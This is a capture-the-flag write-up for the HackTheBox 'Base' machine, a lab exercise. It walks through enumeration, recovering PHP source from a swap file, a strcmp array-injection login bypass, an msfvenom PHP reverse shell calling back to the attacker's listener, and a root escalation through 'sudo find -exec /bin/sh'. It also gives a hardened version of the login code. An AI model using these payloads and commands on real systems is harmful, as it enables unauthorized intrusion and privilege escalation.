HackTheBox Base Writeup

Enjoy reading my HTB Base Writeup

Information Gathering

Let's begin with some basic Information Gathering about the target using nmap:

sudo nmap -p 1-5000 -sV -sC -v 10.10.10.48

This reveals that SSH is running on port 22 and a web service (Apache httpd 2.4.29 (Ubuntu)) on port 80.

On the index page, we find a link to a file called login.php, which tells us that a PHP interpreter is running and that there is some kind of user system.

Using gobuster we can try to find some more files:

gobuster dir -u http://10.10.10.48 -x php -w /Lists/gobuster/directory-list.txt

Gobuster finds three directories, as well as a file called upload.php, which redirects to login.php, probably because we are not logged in and don't have a session cookie.

The static directory only contains some font files and stuff like that, nothing interesting. Inside the login directory, we can find a config.php, a login.php, and a login.php.swp file.

Swap (.swp) files are created by editors such as vim to hold the unsaved state of a file while it is being edited.

I first tried to recover the swap file by opening it with vim (vim login.php.swp) and then using the :recover command. Unfortunately, I got the following error message:

login.php.swp cannot be used on this computer.
The file was created on ntu,
or the file has been damaged.

Using the strings command, you can get the original content back: strings login.php.swp > login.php.


Bypassing the login system

Taking a look at the PHP code that implements the login function, we can see that the developer uses strcmp in combination with ==. Two equal signs perform a loose comparison that checks only the value (after type juggling), whereas three equal signs also compare the types.

In PHP this is a major security issue, as you can turn the submitted variables into arrays: strcmp cannot compare an array and returns NULL instead, and NULL == 0 evaluates to TRUE under loose comparison, so the check passes.

Start Burp Suite and intercept the login request, then change the request body from username=test&password=test to username[]=test&password[]=test.
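The comparison described above, side by side with a hardened version, as an added example (not the box's own login.php or config.php); the stored credentials and function names are constructed for illustration:

```php
<?php
// Added example, not the box's login.php. Stored credentials are constructed
// placeholders standing in for what config.php would hold.
$STORED_USER = 'demo_user';
$STORED_PASS = 'demo_password';
$STORED_HASH = password_hash($STORED_PASS, PASSWORD_DEFAULT);

// Vulnerable: strcmp() cannot compare an array. On PHP 7 it emits a warning and
// returns NULL, and NULL == 0 is true, so both checks pass for "username[]=x".
function login_vulnerable($user, $pass, string $stored_user, string $stored_pass): bool
{
    return strcmp($user, $stored_user) == 0 && strcmp($pass, $stored_pass) == 0;
}

// Hardened: insist on strings before comparing, compare in constant time, and
// keep only a password hash in the config file, never the password itself.
function login_hardened($user, $pass, string $stored_user, string $stored_hash): bool
{
    if (!is_string($user) || !is_string($pass)) {
        return false;                      // "username[]=x" arrives as an array
    }
    return hash_equals($stored_user, $user) && password_verify($pass, $stored_hash);
}

// Runs one check and reports the outcome; PHP 8 turns the array into a TypeError.
function attempt(callable $check, array $post, string $u, string $p): string
{
    try {
        return @$check($post['username'], $post['password'], $u, $p) ? 'LOGIN OK' : 'denied';
    } catch (TypeError $e) {
        return 'TypeError (PHP 8 rejects the array outright)';
    }
}

// Constructed request bodies: the second is what username[]=test&password[]=test parses to.
$normal = ['username' => 'test', 'password' => 'test'];
$arrays = ['username' => ['test'], 'password' => ['test']];

printf("vulnerable / normal : %s\n", attempt('login_vulnerable', $normal, $STORED_USER, $STORED_PASS));
printf("vulnerable / arrays : %s\n", attempt('login_vulnerable', $arrays, $STORED_USER, $STORED_PASS));
printf("hardened   / normal : %s\n", attempt('login_hardened', $normal, $STORED_USER, $STORED_HASH));
printf("hardened   / arrays : %s\n", attempt('login_hardened', $arrays, $STORED_USER, $STORED_HASH));
```

On PHP 7 the vulnerable function reports LOGIN OK for the array body while the hardened one denies every wrong attempt; on PHP 8 the array is refused with a TypeError, which still leaves the loose comparison as a bug worth fixing.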

With msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > shell.php I created a PHP reverse shell and uploaded it onto the server. Start a netcat listener on the chosen port and navigate to /_uploaded/shell.php in your browser to spawn a session as www-data.

Taking a look at config.php we get the following credentials: admin@thisisagoodpassword.


Retrieving the flags

I had problems upgrading my shell to a pty session using Python. Because of that, I switched to the PHP shell from pentestmonkey and was then able to upgrade my shell with python -c "import pty;pty.spawn('/bin/bash')".

Afterwards, I switched to the user john with the password we found earlier in config.php.

Navigate to /home/user/john/ to gain the user flag.

sudo -l revealed that john is allowed to execute /usr/bin/find as root.

The find binary can be used to gain elevated privileges, as documented on GTFOBins.

Use sudo find . -exec /bin/sh \; -quit to gain root permissions.

Now you are able to navigate to /root and read the system flag.


Tags:

htb, hackthebox, base, privilege escalation